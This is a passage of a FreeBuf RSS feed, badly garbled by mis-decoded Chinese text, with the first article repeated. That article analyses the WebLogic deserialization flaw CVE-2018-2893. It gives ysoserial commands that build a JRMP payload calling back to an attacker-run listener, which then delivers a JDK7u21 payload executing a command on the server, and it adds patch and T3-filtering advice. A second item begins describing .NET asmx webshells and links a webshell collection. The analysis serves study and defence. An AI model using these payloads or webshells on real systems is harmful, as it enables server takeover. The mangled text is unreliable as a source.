å¯ä»¥çœ‹åˆ°MapEntry调用的setValue调用了其ä¸çš„checkSetvalue方法。好了哪里调用了setValueå‘¢? 那就是ç»å…¸çš„sun.reflect.annotation.AnnotationInvocationHandler,它é‡å†™äº†ReadObjectååºåˆ—化的方法,其ä¸å°±è°ƒç”¨äº†MapEntryçš„SetValue方法。 ç„¶åŽWebLogicçš„T3å议走的都是ReadObjectæ–¹æ³•ï¼Œæ‰€ä»¥ä½ ç»™ä»–é€šè¿‡T3åè®®å‘é€WriteObject方法åºåˆ—化åŽçš„二进制å—节,他就自然的走上é¢çš„æ”»å‡»é“¾äº†ï¼Œä¸‹é¢é™„上完整攻击链。 LazyMap其实也是类似的,åªä¸è¿‡å€Ÿç”¨äº†åЍæ€ä»£ç†çš„æ–¹æ³•去实现。 å¯ä»¥çœ‹åˆ°Lazymapä¸çš„get方法调用了transfrom方法。 ç»å…¸çš„sun.reflect.annotation.AnnotationInvocationHandlerçš„invokeæ–¹æ³•ä¸æŽ‰ç”¨äº†get方法,通过动æ€ä»£ç†æ–¹å¼å°±å¯ä»¥è°ƒç”¨è¿™ä¸ªæ–¹æ³•。 ç„¶åŽè°ˆè°ˆRMI绕过,RMIåˆéƒ½æ˜¯èµ°çš„åºåˆ—化和ååºåˆ—化,所以CVE-2017-3248å’ŒCVE-2018-2628 æ¼æ´žéƒ½æ˜¯è¿™ä¹ˆç»•过的。CVE-2018-2628æ˜¯å› ä¸ºè¡¥ä¸åªå°å µäº†CVE-2017-3248的接å£java.rmi.registry.Registry,然而CVE-2018-2628是利用了java.rmi.activation.Activator接å£ç»•过了黑åå•。 RMI是Remote Method Invocation的简称,是J2SE的一部分,能够让程åºå‘˜å¼€å‘出基于Java的分布å¼åº”用。一个RMI对象是一个远程Java对象,å¯ä»¥ä»Žå¦ä¸€ä¸ªJava虚拟机上(甚至跨过网络)调用它的方法,å¯ä»¥åƒè°ƒç”¨æœ¬åœ°Javaå¯¹è±¡çš„æ–¹æ³•ä¸€æ ·è°ƒç”¨è¿œç¨‹å¯¹è±¡çš„æ–¹æ³•ï¼Œä½¿åˆ†å¸ƒåœ¨ä¸åŒçš„JVMä¸çš„å¯¹è±¡çš„å¤–è¡¨å’Œè¡Œä¸ºéƒ½åƒæœ¬åœ°å¯¹è±¡ä¸€æ ·ã€‚ RMIä¼ è¾“è¿‡ç¨‹éƒ½ä½¿ç”¨åºåˆ—化和ååºåˆ—化,如果RMIæœåŠ¡ç«¯ç«¯å£å¯¹å¤–å¼€å‘,并且æœåŠ¡ç«¯ä½¿ç”¨äº†åƒApache CommonsCollections这类库,那么会导致远程命令执行。 RMIä¾èµ–于Java远程消æ¯äº¤æ¢åè®®JRMP(JavaRemote Messaging Protocol),该å议为Javaå®šåˆ¶ï¼Œè¦æ±‚æœåŠ¡ç«¯ä¸Žå®¢æˆ·ç«¯éƒ½ä¸ºJava编写, å› ä¸ºåŽæ¥è¡¥ä¸æŠŠCommons Collectionsåº“æ¼æ´žè¡¥æŽ‰äº†ï¼Œå射链没有了,所以这次的CVE-2018-2893是通过JDKçš„ååºåˆ—åŒ–æ¼æ´žå®žçŽ°çš„RCE也就是ysoserialä¸çš„JDK7u21å°±å¯ä»¥å®žçŽ°ç»•è¿‡ã€‚åŽæ¥è¿˜æœ‰å‡çº§ç‰ˆçš„JDK8u20是在JDK7u21å‘展æ¥çš„。JDK7u21利用链也是ååˆ†å¤æ‚的但是还是有很多共åŒç‚¹çš„,它也是借用了跟lazymap相åŒçš„动æ€ä»£ç†æ€è·¯ï¼Œèµ°çš„也是ç»å…¸çš„sun.reflect.annotation.AnnotationInvocationHandlerçš„invoke方法,这个走的是hashcode这个分支。 å› ä¸ºcommonscollection被干掉了ä¸èƒ½èµ°Lazymap那个分支调用InvokerTransformerä¸çš„transform方法。所以å¯ä»¥è‡ªå·±å†™äº†ä¸ªæ¶æ„çš„TemplatesImpl类对象自己å˜åˆ°LinkedHashSet 而LinkedHashSet继承了Hashset,而Hashsetåˆé‡å†™äº†ReadObject方法,并调用了put方法。 Putæ–¹æ³•ä¸æœ‰ä¸€å¤„hash绕过,已有详细分æžä¸å†è¿™é‡Œä»‹ç»ã€‚ 最åŽçœ‹ä¸‹åˆ©ç”¨ä»£ç ï¼Œå…ˆåˆ›å»ºäº†æ¶æ„çš„TemplatesImpl对象,然åŽé€šè¿‡InvocationHandler动æ€ä»£ç†è°ƒç”¨invoke方法,String zeroHashCodeStr =”f5a5a608″;这个就是为了hash绕过,使proxy.hashCode() == templates.hashCode() 在JDK7u21之åŽçš„版本和JDK8u20的版本ä¸ä¿®å¤äº†ç»å…¸çš„sun.reflect.annotation.AnnotationInvocationHandlerï¼Œè¿™é‡Œå¦‚æžœæ£€æµ‹å‡ºä¸æ˜¯AnnotationType,就会退出抛出异常并退出ååºåˆ—化æµç¨‹ã€‚ 这里的绕过æ€è·¯å°±æ˜¯å…¶å®žvar1.defaultReadObject()å·²ç»å®Œæˆäº†ååºåˆ—åŒ–æˆ‘ä»¬çš„æ¶æ„åºåˆ—化代ç ,åªä¸è¿‡åŽé¢å¼‚常终æ¢äº†ï¼Œæ‰€ä»¥éœ€è¦æ‰¾ä¸€å¤„也抛出异常的readObjectæ–¹æ³•ä½†æ˜¯åŒæ—¶å¼‚常处ç†å•¥ä¹Ÿæ²¡æœ‰åšå°±å¯ä»¥äº†ã€‚ java.beans.beancontext.BeanContextSupportä¸å°±æœ‰è¿™ä¹ˆä¸€ä¸ªç‚¹å¯ä»¥åˆ©ç”¨ï¼Œå¯ä»¥çœ‹åˆ°continue。它返回到BeanContextSupport.readObject()方法ä¸ï¼Œç»§ç»æ‰§è¡Œåˆ°deserialize。 所以在JDk7u21基础上åºåˆ—化的二进制数æ®ä¸æ’入一段BeanContextSupportå¯¹è±¡ï¼Œè¿™ä¸ªå¯¹è±¡æ²¡æœ‰åŠ å…¥åˆ°åŠ¨æ€ä»£ç†ä¸ï¼Œåœ¨ååºåˆ—化完æˆåŽå°±ä¼šè¢«å¿½ç•¥ï¼Œä½†æ˜¯è¿˜æ˜¯ä¼šåˆ†é…一个Handleï¼Œå°±ä¼šç»•è¿‡æŠ›å‡ºå¼‚å¸¸ä¸æ–的问题,其他点跟JDK7u21çš„åˆ©ç”¨é“¾å°±ä¸€æ ·äº†ï¼Œä¸è¿‡è¿™é‡Œéœ€è¦æ›´æ”¹åç§»ï¼Œæœ‰æ–‡ç« è¯¦ç»†ä»‹ç»ä¸å†ç´¯è¿°ã€‚ ä¸‰ã€æ¼æ´žåˆ©ç”¨ 这里使用的是CVE-2018-2628åŠ ä¸ŠJDK7u21,从下é¢çš„图å¯ä»¥çœ‹åˆ°ä½¿ç”¨çš„æ˜¯JDK7u10, ç†è®ºä¸ŠJDK 7系列版本å°äºŽç‰äºŽ21的都å¯ä»¥æˆåŠŸè§¦å‘æ¼æ´žã€‚ >java-jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar JRMPClient2"192.168.1.105:1099" > payload_1 这个payload其实就是CVE-2018-2628çš„java.rmi.activation.Activatorç„¶åŽé€šè¿‡T3åè®®å‘é€ç»™WebLogic,WebLogicçš„RMI收到åŽé€šè¿‡JRMPå‘é€ç»™ysoserial写好的Server端 在192.168.1.105ä¸ŠåšæœåŠ¡ç«¯çš„ç›‘å¬ï¼Œå¦‚果收到WebLogicçš„RMIé€šä¿¡å°±ä¸‹å‘ JDK7u21çš„payloadç»™WebLogic弹出个计算器 java-cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099Jdk7u21 "calc.exe" å››ã€ä¿®å¤å»ºè®® 1) å®˜æ–¹è¡¥ä¸ Oracle官方已ç»åœ¨7æœˆçš„å…³é”®è¡¥ä¸æ›´æ–°ä¸ä¿®å¤äº†æ¤æ¼æ´žï¼Œå—å½±å“的用户请尽快å‡çº§æ›´æ–°è¿›è¡Œé˜²æŠ¤ã€‚ å¯ä½¿ç”¨æ£ç‰ˆè½¯ä»¶è®¸å¯è´¦æˆ·ç™»å½•https://support.oracle.com,下载最新补ä¸ã€‚ 2) æ‰‹å·¥ä¿®å¤ è‹¥è¦åˆ©ç”¨è¯¥æ¼æ´ž, 攻击者首先需è¦ä¸ŽWebLogic Serveræä¾›çš„T3æœåŠ¡ç«¯å£å»ºç«‹SOCKET连接, è¿ç»´äººå‘˜å¯é€šè¿‡æŽ§åˆ¶T3å议的访问æƒé™æ¥ä¸´æ—¶é˜»æ–æ¼æ´žåˆ©ç”¨ã€‚ WebLogicæä¾›äº†åå«â€œweblogic.security.net.ConnectionFilterImplâ€çš„默认连接ç›é€‰å™¨ã€‚该连接ç›é€‰å™¨å¯æŽ§åˆ¶æ‰€æœ‰ä¼ 入连接,通过修改æ¤è¿žæŽ¥ç›é€‰å™¨è§„则,å¯å¯¹T3åŠT3Så议进行访问控制。 *本文作者:alphalab,转载请注明æ¥è‡ªFreeBuf.COM]]></description>
1628 <content:encoded><![CDATA[<h2>一ã€èƒŒæ™¯ä»‹ç»</h2>
1629<p><b style="color: rgb(0, 176, 80);">WebLogic是美国Oracleå…¬å¸å‡ºå“的一个Application Server,确切的说是一个基于JAVA EE架构的ä¸é—´ä»¶, WebLogic是用于开å‘ã€é›†æˆã€éƒ¨ç½²å’Œç®¡ç†å¤§åž‹åˆ†å¸ƒå¼Web应用ã€ç½‘络应用和数æ®åº“应用的Java应用æœåŠ¡å™¨ã€‚</b></p>
1630<h3>1.1 æ¼æ´žæè¿°</h3>
1631<p>Oracle官方在2018å¹´7月å‘å¸ƒäº†å…³é”®è¡¥ä¸æ›´æ–°ï¼Œå…¶ä¸åŒ…å«äº†Oracle WebLogic Server的一个高å±çš„WebLogicååºåˆ—åŒ–æ¼æ´žï¼Œé€šè¿‡è¯¥æ¼æ´žï¼Œæ”»å‡»è€…å¯ä»¥åœ¨æœªæŽˆæƒçš„æƒ…况下远程执行代ç 。 </p>
1632<p>æ¤æ¼æ´žäº§ç”ŸäºŽWebLogic T3æœåŠ¡ï¼Œå½“å¼€æ”¾WebLogic控制å°ç«¯å£ï¼ˆé»˜è®¤ä¸º7001端å£ï¼‰æ—¶ï¼ŒT3æœåŠ¡ä¼šé»˜è®¤å¼€å¯ï¼Œå› æ¤ä¼šé€ æˆè¾ƒå¤§å½±å“ã€‚ç»“åˆæ›¾ç»çˆ†å‡ºçš„WebLogic WLS ç»„ä»¶æ¼æ´žï¼Œä¸æŽ’é™¤ä¼šæœ‰æ”»å‡»è€…åˆ©ç”¨æ¼æ´žæŒ–矿的å¯èƒ½ï¼Œå› æ¤ï¼Œå»ºè®®å—å½±å“ä¼ä¸šç”¨æˆ·å°½å¿«éƒ¨ç½²é˜²æŠ¤æŽªæ–½ã€‚</p>
1633<h3>1.2 å—å½±å“的系统版本</h3>
1634<blockquote><p>WebLogic10.3.6.0</p>
1635<p>WebLogic12.1.3.0</p>
1636<p>WebLogic12.2.1.2</p>
1637<p>WebLogic12.2.1.3</p>
1638</blockquote>
1639<h3>1.3 æ¼æ´žç¼–å·</h3>
1640<p>CVE-2018-2893</p>
1641<h2>äºŒã€æ¼æ´žç»†èŠ‚</h2>
1642<p>这次的WebLogic (CVE-2018-2893)æ¼æ´žå’Œä¹‹å‰çš„JRMPåè®®æ¼æ´ž(CVE-2018-2628)æ¼æ´žæ˜¯åˆ†ä¸å¼€çš„,他是结åˆäº†RMI机制缺陷和JDKååºåˆ—åŒ–æ¼æ´žç»•过了WebLogic黑åå•,所以介ç»è¿™ä¸ªæ¼æ´žä¹‹å‰ï¼Œå…ˆå›žé¡¾ä¸‹ä¹‹å‰çš„æ¼æ´žåˆ©ç”¨é“¾ã€‚</p>
1643<p>在CVE-2015-4852 ä¸åˆ©ç”¨çš„æ˜¯Commons Collections 库,主æµçš„两大利用链是TransformedMapå’ŒLazymapï¼Œå…¶å®žä»–ä»¬çš„æ ¸å¿ƒéƒ½æ˜¯ç±»ä¼¼çš„ã€‚</p>
1644<p>先拿TransformedMapåšä¸ªä»‹ç»ï¼Œæ ¸å¿ƒæ˜¯å射机制。</p>
1645<h3><strong>å射机制</strong></h3>
1646<p>JAVAå射机制是在è¿è¡Œçжæ€ä¸ï¼Œå¯¹äºŽä»»æ„一个类,都能够知é“这个类的所有属性和方法;对于任æ„一个对象,都能够调用它的任æ„一个方法和属性;这ç§åЍæ€èŽ·å–的信æ¯ä»¥åŠåЍæ€è°ƒç”¨å¯¹è±¡çš„æ–¹æ³•的功能称为Javaè¯è¨€çš„å射机制。</p>
1647<p>å¯¹åº”å¾—ä»£ç æ˜¯è¿™æ ·,下é¢è¿™æ®µä»£ç å°±å¯ä»¥é€šè¿‡å射调用java.net.URLClassLoader.class,这个类å¯ä»¥æœ¬åœ°æˆ–者远程拉起任æ„çš„jaræ–‡ä»¶ï¼ŒåŒæ—¶ä¸ç”¨ç®¡æ–‡ä»¶ååŽç¼€ï¼Œç›´æŽ¥è¯»å–二进制的jar文件。下é¢è¿™ä¸ªæ˜¯æ‹‰èµ·äº†ä¸€ä¸ªåå¼¹Shell功能的jar文件。</p>
1648<p><img src="http://image.3001.net/images/20180719/15319914858436.png!small"></p>
1649<p>ç„¶åŽå†æ¥çœ‹çœ‹æ ¸å¿ƒçš„å射方法,InvokerTransformerä¸çš„transform方法。这个方法就是实现执行任æ„ç±»çš„æ ¸å¿ƒæ–¹æ³•ï¼Œä½†æ˜¯å¿…é¡»éœ€è¦é€šè¿‡ååºåˆ—化的方å¼è°ƒç”¨è¿™ä¸ªæ–¹æ³•。那么是如何调用的呢?</p>
1650<p><img src="http://image.3001.net/images/20180719/1531991493897.png!small"></p>
1651<p>在TransformedMap䏿œ‰ä¸‰ä¸ªæ–¹æ³•调用了transform方法</p>
1652<p><img src="http://image.3001.net/images/20180719/15319915003634.png!small"></p>
1653<p>下é¢å°±æ˜¯æ‰¾åˆ°è°è°ƒç”¨äº†è¿™3个方法ä¸çš„一个,å¯ä»¥çœ‹åˆ°TransformdMap继承了父类,所有的类都实现了åºåˆ—化接å£ï¼Œä¸ç„¶æ— 法ååºåˆ—化,这个ä¸å†é‡å¤å¼ºè°ƒ</p>
1654<p><img src="http://image.3001.net/images/20180719/15319915082264.png!small"></p>
1655<p>跟进这个父类</p>
1656<p><img src="http://image.3001.net/images/20180719/15319915265605.png!small"></p>
1657<p>å¯ä»¥çœ‹åˆ°MapEntry调用的setValue调用了其ä¸çš„checkSetvalue方法。好了哪里调用了setValueå‘¢?</p>
1658<p>那就是ç»å…¸çš„sun.reflect.annotation.AnnotationInvocationHandler,它é‡å†™äº†ReadObjectååºåˆ—化的方法,其ä¸å°±è°ƒç”¨äº†MapEntryçš„SetValue方法。</p>
1659<p><img src="http://image.3001.net/images/20180719/15319915322704.png!small"></p>
1660<p>ç„¶åŽWebLogicçš„T3å议走的都是ReadObjectæ–¹æ³•ï¼Œæ‰€ä»¥ä½ ç»™ä»–é€šè¿‡T3åè®®å‘é€WriteObject方法åºåˆ—化åŽçš„二进制å—节,他就自然的走上é¢çš„æ”»å‡»é“¾äº†ï¼Œä¸‹é¢é™„上完整攻击链。</p>
1661<p><img src="http://image.3001.net/images/20180719/15319915327269.png!small"></p>
1662<p>LazyMap其实也是类似的,åªä¸è¿‡å€Ÿç”¨äº†åЍæ€ä»£ç†çš„æ–¹æ³•去实现。</p>
1663<p><img src="http://image.3001.net/images/20180719/15319915352326.png!small"></p>
1664<p>å¯ä»¥çœ‹åˆ°Lazymapä¸çš„get方法调用了transfrom方法。</p>
1665<p>ç»å…¸çš„sun.reflect.annotation.AnnotationInvocationHandlerçš„invokeæ–¹æ³•ä¸æŽ‰ç”¨äº†get方法,通过动æ€ä»£ç†æ–¹å¼å°±å¯ä»¥è°ƒç”¨è¿™ä¸ªæ–¹æ³•。</p>
1666<p><img src="http://image.3001.net/images/20180719/15319915458850.png!small"></p>
1667<p>ç„¶åŽè°ˆè°ˆRMI绕过,RMIåˆéƒ½æ˜¯èµ°çš„åºåˆ—化和ååºåˆ—化,所以CVE-2017-3248å’ŒCVE-2018-2628 æ¼æ´žéƒ½æ˜¯è¿™ä¹ˆç»•过的。CVE-2018-2628æ˜¯å› ä¸ºè¡¥ä¸åªå°å µäº†CVE-2017-3248的接å£java.rmi.registry.Registry,然而CVE-2018-2628是利用了java.rmi.activation.Activator接å£ç»•过了黑åå•。</p>
1668<p>RMI是Remote Method Invocation的简称,是J2SE的一部分,能够让程åºå‘˜å¼€å‘出基于Java的分布å¼åº”用。一个RMI对象是一个远程Java对象,å¯ä»¥ä»Žå¦ä¸€ä¸ªJava虚拟机上(甚至跨过网络)调用它的方法,å¯ä»¥åƒè°ƒç”¨æœ¬åœ°Javaå¯¹è±¡çš„æ–¹æ³•ä¸€æ ·è°ƒç”¨è¿œç¨‹å¯¹è±¡çš„æ–¹æ³•ï¼Œä½¿åˆ†å¸ƒåœ¨ä¸åŒçš„JVMä¸çš„å¯¹è±¡çš„å¤–è¡¨å’Œè¡Œä¸ºéƒ½åƒæœ¬åœ°å¯¹è±¡ä¸€æ ·ã€‚</p>
1669<p>RMIä¼ è¾“è¿‡ç¨‹éƒ½ä½¿ç”¨åºåˆ—化和ååºåˆ—化,如果RMIæœåŠ¡ç«¯ç«¯å£å¯¹å¤–å¼€å‘,并且æœåŠ¡ç«¯ä½¿ç”¨äº†åƒApache CommonsCollections这类库,那么会导致远程命令执行。</p>
1670<p>RMIä¾èµ–于Java远程消æ¯äº¤æ¢åè®®JRMP(JavaRemote Messaging Protocol),该å议为Javaå®šåˆ¶ï¼Œè¦æ±‚æœåŠ¡ç«¯ä¸Žå®¢æˆ·ç«¯éƒ½ä¸ºJava编写,</p>
1671<p>å› ä¸ºåŽæ¥è¡¥ä¸æŠŠCommons Collectionsåº“æ¼æ´žè¡¥æŽ‰äº†ï¼Œå射链没有了,所以这次的CVE-2018-2893是通过JDKçš„ååºåˆ—åŒ–æ¼æ´žå®žçŽ°çš„RCE也就是ysoserialä¸çš„JDK7u21å°±å¯ä»¥å®žçŽ°ç»•è¿‡ã€‚åŽæ¥è¿˜æœ‰å‡çº§ç‰ˆçš„JDK8u20是在JDK7u21å‘展æ¥çš„。JDK7u21利用链也是ååˆ†å¤æ‚的但是还是有很多共åŒç‚¹çš„,它也是借用了跟lazymap相åŒçš„动æ€ä»£ç†æ€è·¯ï¼Œèµ°çš„也是ç»å…¸çš„sun.reflect.annotation.AnnotationInvocationHandlerçš„invoke方法,这个走的是hashcode这个分支。</p>
1672<p><img src="http://image.3001.net/images/20180719/15319915564875.png!small"></p>
1673<p>å› ä¸ºcommonscollection被干掉了ä¸èƒ½èµ°Lazymap那个分支调用InvokerTransformerä¸çš„transform方法。所以å¯ä»¥è‡ªå·±å†™äº†ä¸ªæ¶æ„çš„TemplatesImpl类对象自己å˜åˆ°LinkedHashSet</p>
1674<p><img src="http://image.3001.net/images/20180719/15319915645276.png!small"></p>
1675<p>而LinkedHashSet继承了Hashset,而Hashsetåˆé‡å†™äº†ReadObject方法,并调用了put方法。</p>
1676<p><img src="http://image.3001.net/images/20180719/15319915737939.png!small"></p>
1677<p>Putæ–¹æ³•ä¸æœ‰ä¸€å¤„hash绕过,已有详细分æžä¸å†è¿™é‡Œä»‹ç»ã€‚</p>
1678<p><img src="http://image.3001.net/images/20180719/15319915803753.png!small"></p>
1679<p>最åŽçœ‹ä¸‹åˆ©ç”¨ä»£ç ï¼Œå…ˆåˆ›å»ºäº†æ¶æ„çš„TemplatesImpl对象,然åŽé€šè¿‡InvocationHandler动æ€ä»£ç†è°ƒç”¨invoke方法,String zeroHashCodeStr =”f5a5a608″;这个就是为了hash绕过,使proxy.hashCode() == templates.hashCode()</p>
1680<p><img src="http://image.3001.net/images/20180719/15319915889102.png!small"></p>
1681<p>在JDK7u21之åŽçš„版本和JDK8u20的版本ä¸ä¿®å¤äº†ç»å…¸çš„sun.reflect.annotation.AnnotationInvocationHandlerï¼Œè¿™é‡Œå¦‚æžœæ£€æµ‹å‡ºä¸æ˜¯AnnotationType,就会退出抛出异常并退出ååºåˆ—化æµç¨‹ã€‚</p>
1682<p><img src="http://image.3001.net/images/20180719/15319915978548.png!small"></p>
1683<p>这里的绕过æ€è·¯å°±æ˜¯å…¶å®žvar1.defaultReadObject()å·²ç»å®Œæˆäº†ååºåˆ—åŒ–æˆ‘ä»¬çš„æ¶æ„åºåˆ—化代ç ,åªä¸è¿‡åŽé¢å¼‚常终æ¢äº†ï¼Œæ‰€ä»¥éœ€è¦æ‰¾ä¸€å¤„也抛出异常的readObjectæ–¹æ³•ä½†æ˜¯åŒæ—¶å¼‚常处ç†å•¥ä¹Ÿæ²¡æœ‰åšå°±å¯ä»¥äº†ã€‚</p>
1684<p>java.beans.beancontext.BeanContextSupportä¸å°±æœ‰è¿™ä¹ˆä¸€ä¸ªç‚¹å¯ä»¥åˆ©ç”¨ï¼Œå¯ä»¥çœ‹åˆ°continue。它返回到BeanContextSupport.readObject()方法ä¸ï¼Œç»§ç»æ‰§è¡Œåˆ°deserialize。</p>
1685<p><img src="http://image.3001.net/images/20180719/1531991606811.png!small"></p>
1686<p>所以在JDk7u21基础上åºåˆ—化的二进制数æ®ä¸æ’入一段BeanContextSupportå¯¹è±¡ï¼Œè¿™ä¸ªå¯¹è±¡æ²¡æœ‰åŠ å…¥åˆ°åŠ¨æ€ä»£ç†ä¸ï¼Œåœ¨ååºåˆ—化完æˆåŽå°±ä¼šè¢«å¿½ç•¥ï¼Œä½†æ˜¯è¿˜æ˜¯ä¼šåˆ†é…一个Handleï¼Œå°±ä¼šç»•è¿‡æŠ›å‡ºå¼‚å¸¸ä¸æ–的问题,其他点跟JDK7u21çš„åˆ©ç”¨é“¾å°±ä¸€æ ·äº†ï¼Œä¸è¿‡è¿™é‡Œéœ€è¦æ›´æ”¹åç§»ï¼Œæœ‰æ–‡ç« è¯¦ç»†ä»‹ç»ä¸å†ç´¯è¿°ã€‚</p>
1687<h2>ä¸‰ã€æ¼æ´žåˆ©ç”¨</h2>
1688<p>这里使用的是CVE-2018-2628åŠ ä¸ŠJDK7u21,从下é¢çš„图å¯ä»¥çœ‹åˆ°ä½¿ç”¨çš„æ˜¯JDK7u10, ç†è®ºä¸ŠJDK 7系列版本å°äºŽç‰äºŽ21的都å¯ä»¥æˆåŠŸè§¦å‘æ¼æ´žã€‚</p>
1689<p><img src="http://image.3001.net/images/20180719/15319916479818.png!small"></p>
1690<pre><code>>java-jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar JRMPClient2"192.168.1.105:1099" > payload_1</code></pre>
1691<p><img src="http://image.3001.net/images/20180719/15319916543636.png!small"></p>
1692<p>这个payload其实就是CVE-2018-2628çš„java.rmi.activation.Activatorç„¶åŽé€šè¿‡T3åè®®å‘é€ç»™WebLogic,WebLogicçš„RMI收到åŽé€šè¿‡JRMPå‘é€ç»™ysoserial写好的Server端</p>
1693<p><img src="http://image.3001.net/images/20180719/15319921033420.png!small"></p>
1694<p>在192.168.1.105ä¸ŠåšæœåŠ¡ç«¯çš„ç›‘å¬ï¼Œå¦‚果收到WebLogicçš„RMIé€šä¿¡å°±ä¸‹å‘ JDK7u21çš„payloadç»™WebLogic弹出个计算器</p>
1695<pre><code>java-cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099Jdk7u21 "calc.exe"</code></pre>
1696<p><img src="http://image.3001.net/images/20180719/15319921084606.png!small"></p>
1697<p><img src="http://image.3001.net/images/20180719/15319923557542.png!small"></p>
1698<h2>å››ã€ä¿®å¤å»ºè®®</h2>
1699<h3>1) 官方补ä¸</h3>
1700<p>Oracle官方已ç»åœ¨7æœˆçš„å…³é”®è¡¥ä¸æ›´æ–°ä¸ä¿®å¤äº†æ¤æ¼æ´žï¼Œå—å½±å“的用户请尽快å‡çº§æ›´æ–°è¿›è¡Œé˜²æŠ¤ã€‚</p>
1701<p>å¯ä½¿ç”¨æ£ç‰ˆè½¯ä»¶è®¸å¯è´¦æˆ·ç™»å½•<a href="https://support.oracle.com/">https://support.oracle.com</a>,下载最新补ä¸ã€‚</p>
1702<h3>2) 手工修å¤</h3>
1703<p>è‹¥è¦åˆ©ç”¨è¯¥æ¼æ´ž, 攻击者首先需è¦ä¸ŽWebLogic Serveræä¾›çš„T3æœåŠ¡ç«¯å£å»ºç«‹SOCKET连接, è¿ç»´äººå‘˜å¯é€šè¿‡æŽ§åˆ¶T3å议的访问æƒé™æ¥ä¸´æ—¶é˜»æ–æ¼æ´žåˆ©ç”¨ã€‚</p>
1704<p>WebLogicæä¾›äº†åå«â€œweblogic.security.net.ConnectionFilterImplâ€çš„默认连接ç›é€‰å™¨ã€‚该连接ç›é€‰å™¨å¯æŽ§åˆ¶æ‰€æœ‰ä¼ 入连接,通过修改æ¤è¿žæŽ¥ç›é€‰å™¨è§„则,å¯å¯¹T3åŠT3Så议进行访问控制。</p>
1705<p><b style="color: rgb(159, 163, 168);">*本文作者:alphalab,转载请注明æ¥è‡ªFreeBuf.COM</b></p>
1706]]></content:encoded>
1707 <wfw:commentRss>http://www.freebuf.com/vuls/178105.html/feed</wfw:commentRss>
1708 <slash:comments>0</slash:comments>
1709 </item>
1710 <item>
1711 <title>探索基于.NET下实现一å¥è¯æœ¨é©¬ä¹‹Asmx篇</title>
1712 <link>http://www.freebuf.com/articles/web/178010.html</link>
1713 <comments>http://www.freebuf.com/articles/web/178010.html#comments</comments>
1714 <pubDate>Wed, 25 Jul 2018 01:00:31 +0000</pubDate>
1715 <dc:creator>360云影实验室</dc:creator>
1716 <category><![CDATA[WEB安全]]></category>
1717 <category><![CDATA[.Net]]></category>
1718 <category><![CDATA[asmx]]></category>
1719
1720 <guid isPermaLink="false">http://www.freebuf.com/?p=178010</guid>
1721 <description><![CDATA[0×01 å‰è¨€ 上篇介ç»äº†ä¸€èˆ¬å¤„ç†ç¨‹åºï¼ˆashx)的工作原ç†ä»¥åŠå®žçް䏀å¥è¯æœ¨é©¬çš„过程,今天接ç€ä»‹ç»Web Service程åºï¼ˆasmx)下的工作原ç†å’Œå¦‚何实现一å¥è¯æœ¨é©¬ï¼Œå½“然介ç»ä¹‹å‰ç¬”者找到了一款asmx马儿 https://github.com/tennc/webshell/blob/master/caidao-shell/customize.asmx ï¼Œä¾æ—§æ˜¯ä¸€ä¸ªå¤§é©¬å¦‚下图: è¿™ä¸ªè¿˜åªæ˜¯å¯¹å®¢æˆ·ç«¯çš„èœåˆ€åšäº†é€‚é…å¯ç”¨ï¼Œæš‚æ—¶ä¸ç¬¦åˆä¸€å¥è¯æœ¨é©¬çš„ç‰¹ç‚¹å“ˆï¼Œè‡³äºŽè¦æ‰“é€ ä¸€æ¬¾å±…å®¶æ—…è¡Œå¿…å¤‡çš„èœåˆ€é©¬ï¼Œè¿˜å¾—从原ç†ä¸Šæžæ¸…楚 asmxçš„è¿è¡Œè¿‡ç¨‹ã€‚  0×02 ç®€ä»‹å’ŒåŽŸç† Web Service是一个基于å¯ç¼–程的web的应用程åºï¼Œç”¨äºŽå¼€å‘分布å¼çš„互æ“作的应用程åºï¼Œä¹Ÿæ˜¯ä¸€ç§webæœåŠ¡ï¼ŒWeb Service的主è¦ç›®æ ‡æ˜¯è·¨å¹³å°çš„å¯äº’æ“ä½œæ€§ï¼Œä¸ºäº†å®žçŽ°è¿™ä¸€ç›®æ ‡Web Service 完全基于XMLï¼ˆå¯æ‰©å±•æ ‡è®°è¯è¨€ï¼‰ã€XSD(XML Schema)ç‰ç‹¬ç«‹äºŽå¹³å°ã€ç‹¬ç«‹äºŽè½¯ä»¶ä¾›åº”å•†çš„æ ‡å‡†ï¼Œæ˜¯åˆ›å»ºå¯äº’æ“作的ã€åˆ†å¸ƒå¼åº”用程åºçš„æ–°å¹³å°ã€‚简å•çš„æ¥è¯´Web Service具备三个è¦ç´ SOAP(Simple Object Access Protocol)ã€WSDL(WebServicesDescriptionLanguage)ã€UDDI(UniversalDescriptionDiscovery andIntegration)之一, SOAPç”¨æ¥æè¿°ä¼ é€’ä¿¡æ¯çš„æ ¼å¼ï¼Œ WSDL ç”¨æ¥æè¿°å¦‚ä½•è®¿é—®å…·ä½“çš„æŽ¥å£ï¼Œ UDDI用æ¥ç®¡ç†ï¼Œåˆ†å‘查询webService ï¼Œä¹Ÿå› æ¤ä½¿ç”¨Web Service有许多优点,例如å¯ä»¥è·¨å¹³å°å·¥ä½œã€éƒ¨ç½²å‡çº§ç»´æŠ¤èµ·æ¥ç®€å•方便ã€å®žçŽ°å¤šæ•°æ®å¤šä¸ªæœåŠ¡çš„èšåˆä½¿ç”¨ç‰ç‰ã€‚å†ç»“åˆä¸‹å›¾è¯´æ˜Žä¸€ä¸‹WebService工作的æµç¨‹ æ— è®ºä½¿ç”¨ä»€ä¹ˆå·¥å…·ã€è¯è¨€ç¼–写WebService,都å¯ä»¥ä½¿ç”¨ SOAP å议通过 HTTP调用,创建 WebService åŽï¼Œä»»ä½•è¯è¨€ã€å¹³å°çš„客户都å¯ä»¥é˜…读 WSDL 文档æ¥è°ƒç”¨ WebService ï¼ŒåŒæ—¶å®¢æˆ·ç«¯ä¹Ÿå¯ä»¥æ ¹æ® WSDL æè¿°æ–‡æ¡£ç”Ÿæˆä¸€ä¸ª SOAP 请求信æ¯å¹¶å‘é€åˆ°WebæœåŠ¡å™¨ï¼ŒWebæœåС噍å†å°†è¯·æ±‚转å‘ç»™WebService 请求处ç†å™¨ã€‚ 对于.Net而言,WebService请求处ç†å™¨åˆ™æ˜¯ä¸€ä¸ª .NET Framework 自带的 ISAPI Extension。Web请求处ç†å™¨ç”¨äºŽè§£æžæ”¶åˆ°çš„SOAP请求,调用 